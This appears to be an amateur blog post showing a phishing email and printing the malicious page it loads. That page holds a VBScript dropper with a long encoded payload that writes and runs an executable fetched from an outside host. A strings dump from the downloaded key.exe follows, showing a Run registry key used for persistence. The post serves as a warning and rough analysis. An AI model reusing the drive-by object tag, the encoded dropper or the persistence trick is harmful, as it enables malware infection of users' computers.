I got this email tonight: ----------------------------------------------------------------------------------------- From : Lynnette Lindsey <ntfowtdbkzp@yahoo.com> To : Tony Perrie <tony@involution.com> Cc : Attchmnt: Subject : Re: Hello Tony ----- Message Text ----- <object data="http://www.alobhyundajacoupe.com/scr/page.php"> Hi Tony,
Great work with the photo. I agree with you, I've been trying out new photoshop techniques since I joined a month ago... It$ <br>Regards,<br> Kaye Stein ----------------------------------------------------------------------------------------- I could just tell that this email was some type of malware waiting to be unleashed. Mostly because I have no idea WTF this person was talking about. Here's what page.php contained: <html> <script language=vbs> szURL = "http://www.alobhyundajacoupe.com/scr/keyNONONO.exe" </script> <script language="VBScript.Encode"> #@~^Sg4AAA==d.}nMWdkxP{~JZ!T!Z!TTZ!!ZT!Z!!ZTT!Z!Z!T!TTZ!T!ZT!Z!TTZ!!TTZ!T!ZTZ!TZ!Z!!Z!ZT!Z!T!Z!TTZ!!ZT!Z!!ZTT!Z!Z!T!TTZ!TJ@#@&/.ArUmDX~x,JE@#@&d.Ar lMXP{Pk"AbxCDHP'~rcfl),Z!!ZfT!Z!Z!TcTTZ!T!wosw!TTZA%TTZ!T!ZTZ!TZ!Zc!Z!ZT!Z!T!Z!TTZ!!ZT!Z!!ZTT!Z!Z!T!TTZ!T!ZT!Z!TTZJ@#@&d.Arxm.HPx,/.Ak lMzPLPE!Z!TTZ!!ZT!Z!!ZTT!Z!Z!T!$0Z!T!ZT!AFo$z!2TT~cT,;9yF$R!8cZ;fyq*Wv0vOGf+ZG!F+vwvGF+F+fy!&q+22+oJ@#@&d"~kxC.HPxPk"~kUmDHP[,JF* Zv+vl T{yG*+3 Zv,+3+!WcWsX&+T+fs+*vl 3TG!fT)ycT!ZTZ!TZ!Z!!Z!l9%F!qGyF13+vsyqFO2v+o+F8,Avs+qr@#@&/.$k l.z,'Pd"~kUlMz,[~r,Fs,FZyqFy2vw q3lZvF9 8F%AsyFl ,f+%q,Avw qTZ!!TTZ!T!ZTZ!TZ!Z!!Z!ZT!Z!T!Z!TXZc*ZT!ZcZZqT&Z!r@#@&/"$bxCDH~',/"$bxl.z,[~Jz$O&*O&w!!Z!ZT!Z!T!Z!TTZ2!ZT!w!FZ$TFZ*ZZT!T+Z!T!ZT!W!TTZ!!TTZ!T!ZT8!TZ!Z!!8!ZT!Z!T Z!TTZ!!ZTcZ!!r@#@&/.AbxCDz~{Pdy~rxmDz~LPJTT8!T!ZTZ!Ty!Z!!ZcZT!Z!T!Z!TTZ!!Z*!Z!!ZTT!Z!Z!T!TTW!T!ZT!Z!*TZ!!TTZ!T!ZTZ TZ!Z!!Z!ZTFZ!T!ZFTTZ!!r@#@&kyAbUCDHP{Pdy$r l.X,'Pr!TTZF!TTZ!q!ZTZ!TZ!Z!!Z!8T!Z!T!Z!TTZ!!ZT!Z!!ZTT!8%y!T!TTy%T!ZT!Z!TTZ!!TTZ!T!ZTZ!TZ!Z!!Z!ZT!Z!T!ZJ@#@&kyAbUlMXP{~dy~k l.X~',/"}.WdkUn@#@&/"$bxCDH~{Pd.AbxlMX,'Pr!T!Z!TTZ!!ZT!Z!!ZTT!Z!Z!T!TTZ!T!ZT Z!TTZF%TTZ!T!ZTZ!TZ!Z!!Z!ZT!Z!T!Z!TTZ!!ZT!Z!!ZTT!Z!Z!T!TTZ!T!r@#@&ky$r lDz~{Pdy~r l.HPLPJy2F*vlG0GW!TTZ!!+*!Z!!ZTT!8!Z!T!TTZ T!ZT!Z!*TZ!!TTZ!T!ZTZ!TZ!Z!!Z!ZT!Z!T Z!TTZv!y3Gyvc+q{c+FZ!T!E@#@&/"AbUlMX~x,/y$r l.X,',J$A!Z!!Z!ZT Z!T!Z!TTy!!ZT!Z!vZTT!Z!Z!T!TTZ!T!ZT!Z!TTZ!!TTW!T!ZTW!+AvWvFFc+q!Z!T!Z {TZ!!ZT!Z&!ZTT!r@#@&/"ArUmDzP{~/.ArUmDX~',JT!Z+Z!TZ!Z!%Z!ZT!Z!T!Z!TTZ!!ZT!Z!!ZTT!Z!W!T!TT;!T!ZT!Z!TTZ!!TTZ!T!ZTZ!TZ!Z!!Z!ZT!Z!T!Z!TTZ!!ZT!ZJ@#@&d"AbxmDzPx~ky$k CDHP'~ky}n.KSrx~LPd.}DWdk nPLPdy\+.Gdkx~[,/y\n.Wdk +~[~d.}nDKJk +~',/ytnMWJk n,[~ky\+DKSbU+,[~/.}n.KSk nPLP/.tnDKSbxn@#@&d.Arxm.X,'~d.AkUCMX~[,EZ!TZ!Z!!Z!ZT!Z!T!Z!TTZ!!ZT!Z!!ZT3%WGZ!T!TT+v0&;T!z%9TR*F0Z!f!WTZ!3Rcy!!Z!ZTvR!$&ZcTTZ*!A0&8!!ZTE@#@&/.ArxC.HPxPk"AbxC.HP[~EZ!X,+)Z!z!Z%f8f83&ZcT!Z*fX8vbZTswf!+)TF+%82f!*TZ!3%yT!Z!TTZvbTTA%TFZTZ!TZZ;ssy*8T ZcT!Zso+l!!yTJ@#@&/.$rxmDHPxPd"~kUlMzPLPE*Z!!ooy*TcyTW!TZsw *Z%yTcZ!Tsw XT; !WT!Z!!ZTT!Z!Z!T!TTZ!T!ZT!Z!TTZ!!TTZ!T!ZTZ!TZ!Z!!Z!ZT!Z!T!Z!TE@#@&/.$k lDH~xPky~kUl.z,[~/.t+MWJr +P'~kyt+MGdkUPLP/.}.WdkU+,[~d.}+MGSbx+,'~/.}DGSrUP'Pk"}DGJbx+~',/"}.KSr +,[Pky\nDKSrx@#@&d.Ak CDHP',d"AbxmDzP'~rv ZT!Z!{0y!!TTZ%) ZTZ!TOby!!Z!ZX%y!T!Z!TTZ!!ZT!W! ZTT!Z!Z!T!TTZ!T!ZT!Z!)*y!!TTZ!T ZTZ!TZ!Z!!Z!ZE@#@&/"AbxC.HP',dy~kxm.zPLPr!T!TTZ!T!ZT!Z!TTZ!!TTZ!T!ZTZ!TZ!+v Z!ZT!F%+!Z!TTRb ZT!Z!,z+T!Z!Z*0 TTZ!T!ZT!Z!TTR!!T*lG0vO{W*TF r@#@&ky~rxmDzP{Pd"~kxm.X,[Prov2vlGfGfTZZ0!Z*G+*{*W&voGv9v8Av*WZ+,vAvl*FZ!qsZF*{+*GWX!F vwfc8vWv*G+lGfG2T!Z!)*ZFc/wvqvWE@#@&d.AbxlMX,xPky$k l.z,[Pr*Z+,vy{+v8GyG1cqTZ!T,WT lG1+2cX{RvXv2TZv$+*F vAvlZ2&f y2*+Zv;T!Z!Gl{fvlGy&f&++Av*v;ZZ!TTZ!!TE@#@&dy~r l.HP{P/.AbUlMX~[,/"tDWdrxP[,d"}DKSrxn~LPdy\nDKSrUP[~d.}nDKJbxn,[,/y\+MGSbxnPLPd"\+DKJk +@#@&d"AbxmDzPx~ky$k CDHP'~r!!TTZ!T!ZTZ!TZ!Z!!Z!ZT!Z!T!Z!TTZ!!ZT!Z!!ZTT!Z!Z!T!TTZ!T!ZT!Z!TTZG*{++Zf+o+2+AvWvZ+ZZT*l*+c;c*wJ@#@&dy~kxm.zP{Pky$kUCMX~[,EGFv3;vsq+cXc+oWvOv;v*WFZTv2&)*;G1+Av*F0vl!!ZTT!Z!Z!T!TTZ!T!ZT!Z!TTZ!!TTZ!T!ZTZ!TZ!Z!!Z!ZT!Z!TJ@#@&d"~kxm.X,'Pk"$k lMX~[~d.}nDKJk +~',/ytnMWJk n,[~ky\+DKSbU+,[~/.}n.KSk nPLP/.tnDKSbxnP'~kyt+MGSbxn~LP/"tDGSbUP',/.}+MWdrxP'PkytnMWSbU+@#@&/.$rxmDHPxPd"~kUlMzPLPETZ!!TTZ!T!ZTZ!TZ!Z!!Z!ZT!Z!T!Z!TE@#@&/.)waVk1COkKx,'~J^l'6 +XnJ@#@&jnDPtoj}PxP;.lOr(L+1YvE?1DrwDkULcsk^n?H/Yh64N+1YE#@#@&U+OP4ok^+~x,tsj6cZ.+mOKnXYwkV`k"bawsk1lOrKx~,oWMDbOrxT#@#@&rxOJxLY4~',VnUv/y$r l.X*@#@&kUDnK/kDkKUP{Pq@#@&h4r^+PbUYhW/bOrW P@!PrxOJxLY4@#@&1tC.,'P(UD`E[_E,[~tk9`/.AbUlMXSPbxOKK/kDrW ~Pybb@#@&twks+ MkO+v/tM`^4mD#b@#@&kUYhGkkObW P',k OnK/rYbWUQy@#@&Snx9@#@&4orVR;VG/n@#@&?nY,4?4+ss{ZDnCD+64Nn1YcrUmDbwD ?4+sVr#@#@&4?tsVcDE cdyzwaVrmCObWU_r~J3/"i"S#44YDAA==^#~@ </script> </html> Here's some interesting stuff from inside of key.exe: .@1...,h.....c....u.: j. h...Ad.o.tiP...#O;.u.`/. ;2..=..u..Phg.m......K.. ...n....hDz... ....d.h&@ .V....)...v.....B.1z.... .g..P$..0?....o.~.h|j.!. ........mN....|a....hh]Y ...p.Mb....Q.Q.....w.... .0..b.%H ..(............ $L,....048<....@D...@.. ..(.._user32.dll'Q...@P ..svchost.exe{..L\\wingu a...{.&cZOnl.e Serv....i c.SOFTWARE\M.r&oft\....W .dows\CurrentV)sion\Run. 4.o.-{FREEMZ.........d.@ ..............!..LThis p |gr....am cannot b.ro . DOS.?.. mode....$C...8.z .k..}.6..k...Z.k..Rich.] .vsPEL..v].?`........... ........6... ....vr..... ..8%............ .W.m..$ .t.tr..).....B`.rdata... ....'. ..v.@.&_.'0QFL... ..R.PhG4}E4........t.P.. ...2.m....h............7 ....(....m.LF..Pj..5..=b e....4{.7.MPU......E.... .>r...I.@....9r...C.E.+. ...9;y..E4.....3m..Ud..r u.....x......q.-.j2.E... ...D..p....c.f..N...E... ..}|.....u...5@p.@.N?.]. ......uJ.%.;.s...{2w2'.0 ....!.=........d........ :Oi..ni.....G....g...... ...n....{...$...=E6...a. ......^....@.)9Q.....fc. This exploit seemed to not effect pine though, so I'm safe. BUT FOR HOW LONG!?